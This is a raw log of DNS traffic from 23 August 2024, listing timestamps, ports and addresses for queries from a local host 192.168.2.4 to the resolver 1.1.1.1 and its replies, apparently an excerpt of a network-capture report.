Aug 23, 2024 18:47:41.892385960 CEST	58976	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.895136118 CEST	61985	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.895802975 CEST	61274	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896006107 CEST	50786	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896006107 CEST	52377	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896193027 CEST	63049	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896339893 CEST	62220	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896339893 CEST	53846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896508932 CEST	52025	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896508932 CEST	60232	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896703959 CEST	63043	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896703959 CEST	55140	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.896852016 CEST	64836	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897102118 CEST	49543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897102118 CEST	62991	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897377014 CEST	52343	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897377014 CEST	60021	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897540092 CEST	57695	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.897859097 CEST	50098	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.898081064 CEST	58169	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.899291992 CEST	56104	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.902673006 CEST	49592	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.903103113 CEST	59165	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.903443098 CEST	61198	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.903604984 CEST	51402	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.904367924 CEST	54712	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.905278921 CEST	51356	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.908907890 CEST	53	61085	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.908921957 CEST	53	64842	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.908932924 CEST	53	54206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.911410093 CEST	53	61044	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.911423922 CEST	53	56681	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.911433935 CEST	53	49574	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913059950 CEST	53	65263	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913070917 CEST	53	53506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913079977 CEST	53	51462	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913397074 CEST	53	49762	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913408041 CEST	53	57947	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913417101 CEST	53	49725	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913427114 CEST	53	52363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.913439989 CEST	53	62691	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.915827036 CEST	53	58976	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.915838003 CEST	53	61274	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.916008949 CEST	53	49543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.918814898 CEST	53	54698	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.918827057 CEST	53	61985	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.918837070 CEST	53	53846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.919059992 CEST	53	52343	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.919070959 CEST	53	50098	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.919080973 CEST	53	60232	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.922295094 CEST	53	63043	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.922307014 CEST	53	62991	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.922317028 CEST	53	56104	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.922327995 CEST	53	52025	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.922338963 CEST	53	64836	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.924315929 CEST	53	54712	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.924329042 CEST	53	61198	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.924339056 CEST	53	59165	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.925523043 CEST	53	58169	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.930591106 CEST	53	52532	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.933372021 CEST	53	63154	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.935926914 CEST	53	60598	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.939321041 CEST	53	52710	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.940069914 CEST	53	62220	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.942749977 CEST	53	50786	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.942760944 CEST	53	55140	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.943224907 CEST	53	63049	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.945923090 CEST	53	60021	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.945935965 CEST	53	57695	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.951323032 CEST	53	51598	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.951335907 CEST	53	51402	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.952439070 CEST	53	51356	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.958957911 CEST	53	61080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.963223934 CEST	53	61254	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.979331970 CEST	61658	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.981563091 CEST	57685	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.983977079 CEST	53	64232	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:41.985554934 CEST	59284	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.987833977 CEST	56536	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.989670038 CEST	64948	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.990619898 CEST	59355	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.991178036 CEST	53200	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.992166996 CEST	63554	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.992755890 CEST	56301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.993454933 CEST	57558	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.994333029 CEST	64085	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.994452953 CEST	50908	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.995203972 CEST	53508	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.996216059 CEST	65343	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.997490883 CEST	58671	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.997490883 CEST	57744	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.998322964 CEST	61431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:41.998997927 CEST	53916	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.002150059 CEST	59815	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.002808094 CEST	64875	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.003793955 CEST	65483	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.004897118 CEST	63644	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.005412102 CEST	51129	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.006333113 CEST	57125	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.007215023 CEST	55626	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.007339954 CEST	56800	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.008735895 CEST	61391	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.009792089 CEST	50680	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.010561943 CEST	57771	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.011040926 CEST	52275	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.011498928 CEST	64270	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.012243032 CEST	49647	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.013031006 CEST	53	64948	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.015063047 CEST	53	57744	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.015325069 CEST	53	56301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.015974998 CEST	53	53916	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016002893 CEST	53	63554	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016225100 CEST	53	56536	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016309977 CEST	53	65343	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016470909 CEST	53	58671	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016488075 CEST	53	53508	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.016916037 CEST	53	61431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.017982006 CEST	53	59815	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.018748999 CEST	53	63644	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.019704103 CEST	53	51129	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.019715071 CEST	53	64875	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.020045042 CEST	53	55626	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.022185087 CEST	53	56800	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.022716999 CEST	53	57125	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.023468971 CEST	53	61391	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.023854971 CEST	53	64270	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.023865938 CEST	53	52275	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.024059057 CEST	53	49647	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.024068117 CEST	53	65483	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.024883032 CEST	63969	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.031871080 CEST	53	64602	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.037496090 CEST	53	50908	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.038096905 CEST	53	57558	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.038108110 CEST	53	64085	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.041096926 CEST	53	63969	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.051160097 CEST	53	57771	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.054160118 CEST	53	50680	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.089272976 CEST	53	49592	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.100159883 CEST	53	52377	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.165682077 CEST	53	59284	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.170911074 CEST	53	53200	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.205738068 CEST	53	59355	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.211807013 CEST	53	61658	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.231192112 CEST	53	57685	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.347837925 CEST	53	56998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.663491964 CEST	62080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.664375067 CEST	62561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.679574966 CEST	53	62080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.680053949 CEST	53	62561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.705775976 CEST	64251	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.705976009 CEST	62550	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.706271887 CEST	51191	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.706502914 CEST	53274	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.707025051 CEST	49742	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.707210064 CEST	62816	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.707700014 CEST	61952	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.707916021 CEST	54109	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.716909885 CEST	53	62550	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.720671892 CEST	53	61952	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.720856905 CEST	53	49742	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.721312046 CEST	53	53274	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.725516081 CEST	58139	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.728065014 CEST	53	64251	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.730881929 CEST	52253	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.731311083 CEST	51162	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.731482029 CEST	62966	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.731700897 CEST	53438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.731962919 CEST	64102	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732188940 CEST	50119	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732247114 CEST	56594	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732429981 CEST	57549	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732547045 CEST	53995	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732743979 CEST	59495	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.732875109 CEST	55927	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.733037949 CEST	65520	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.733314991 CEST	50034	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.733608007 CEST	60737	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.733783007 CEST	50229	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.733951092 CEST	55683	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.734122992 CEST	54147	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.734457016 CEST	60112	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.734683037 CEST	52533	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.734829903 CEST	53187	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.735090971 CEST	53341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.735308886 CEST	49553	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.735466003 CEST	49509	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736140966 CEST	59261	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736345053 CEST	56492	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736447096 CEST	51177	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736603022 CEST	61679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736762047 CEST	58860	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.736906052 CEST	62096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.737046957 CEST	60463	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.743776083 CEST	53	62816	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.745014906 CEST	53	54109	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.745031118 CEST	53	51191	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.747864008 CEST	61240	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.748043060 CEST	53	51162	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748056889 CEST	52193	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.748086929 CEST	53	53995	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748096943 CEST	53	53438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748241901 CEST	56987	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.748475075 CEST	53	55927	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748493910 CEST	53	56594	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748497963 CEST	53	60737	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.748694897 CEST	53	50034	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.749372959 CEST	58104	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.749536037 CEST	56958	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.749752998 CEST	54642	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.749772072 CEST	53	54147	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.749887943 CEST	50679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.750624895 CEST	54834	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.750786066 CEST	60554	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.750910044 CEST	62506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.751107931 CEST	62585	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.751144886 CEST	53	49553	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.751300097 CEST	62577	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.751636982 CEST	53	59261	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.751648903 CEST	53	55683	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.751847982 CEST	64854	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.752116919 CEST	61314	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.752408981 CEST	58970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.752485991 CEST	53	60112	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.752499104 CEST	53	61679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.752509117 CEST	53	51177	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.753125906 CEST	59333	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.753300905 CEST	55839	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.753433943 CEST	53	62096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.753444910 CEST	53	56492	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.753458023 CEST	58191	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.753710985 CEST	60412	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.753997087 CEST	53	53187	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.754631042 CEST	58843	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.754887104 CEST	50651	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.755065918 CEST	50309	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.755208015 CEST	62481	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.764895916 CEST	53	58104	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.765010118 CEST	53	52193	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.765019894 CEST	53	56958	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.766412973 CEST	53	54642	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.767266989 CEST	53	50679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.770513058 CEST	53	58139	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.771791935 CEST	53	61314	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.771804094 CEST	53	58970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.773216963 CEST	53	62585	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.773227930 CEST	53	55839	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.774018049 CEST	53	59333	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.774028063 CEST	53	59495	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.774036884 CEST	53	62966	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775365114 CEST	53	60412	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775377035 CEST	53	58191	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775386095 CEST	53	57549	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775396109 CEST	53	64102	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775403976 CEST	53	65520	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775413990 CEST	53	62481	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775422096 CEST	53	50119	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.775432110 CEST	53	49509	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.777003050 CEST	53	53341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.777014017 CEST	53	52253	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.777023077 CEST	53	60463	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.777026892 CEST	53	58860	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.784141064 CEST	53	61240	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.784929037 CEST	53	56987	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.788659096 CEST	53	60554	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.789921045 CEST	53	62577	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.789932013 CEST	53	54834	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.790178061 CEST	53	64854	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.791445017 CEST	53	50309	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.792632103 CEST	53	50651	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.793958902 CEST	53	62506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.795661926 CEST	53	58843	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.888098001 CEST	53778	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.895327091 CEST	53	53778	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.895463943 CEST	53	52533	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.896992922 CEST	53	50229	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.942323923 CEST	57888	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.943033934 CEST	53521	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.943610907 CEST	54201	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.950983047 CEST	53641	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.951832056 CEST	57690	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.954108953 CEST	53	53521	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.956535101 CEST	57022	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.956621885 CEST	53	57888	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.956732988 CEST	65360	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.956890106 CEST	65100	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.957046986 CEST	59820	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.957956076 CEST	53	54201	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.976017952 CEST	64348	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.980217934 CEST	53	65100	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.980382919 CEST	64202	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.980422974 CEST	53	59820	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.980434895 CEST	53	57022	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.980714083 CEST	57215	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.980848074 CEST	58231	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.981100082 CEST	63443	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.981374025 CEST	65121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:42.987920046 CEST	53	64348	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.989089966 CEST	53	57690	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.991472006 CEST	53	57215	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.992587090 CEST	53	63443	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:42.993823051 CEST	53	65121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.000443935 CEST	53	65360	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.003557920 CEST	49956	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.009031057 CEST	57369	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.009140015 CEST	61229	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.009397030 CEST	61675	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.009560108 CEST	65277	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.009839058 CEST	54616	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.010021925 CEST	56433	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.010262012 CEST	52489	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.010462046 CEST	49177	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.010718107 CEST	57820	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.010967016 CEST	50137	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.011208057 CEST	63660	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.011507034 CEST	50050	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.011876106 CEST	53	64202	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.014025927 CEST	56299	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.014755964 CEST	54445	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.014945030 CEST	59660	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.015314102 CEST	60188	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.015784025 CEST	53122	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:43.018037081 CEST	53	58231	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.019850969 CEST	53	65277	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.020633936 CEST	53	57369	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.021745920 CEST	53	63660	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.021972895 CEST	53	50137	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.021984100 CEST	53	49177	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.022636890 CEST	53	56433	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.022960901 CEST	53	50050	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.024473906 CEST	53	57820	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.025856972 CEST	53	56299	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.027247906 CEST	53	59660	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:43.032399893 CEST	53	53122	1.1.1.1	192.168.2.4
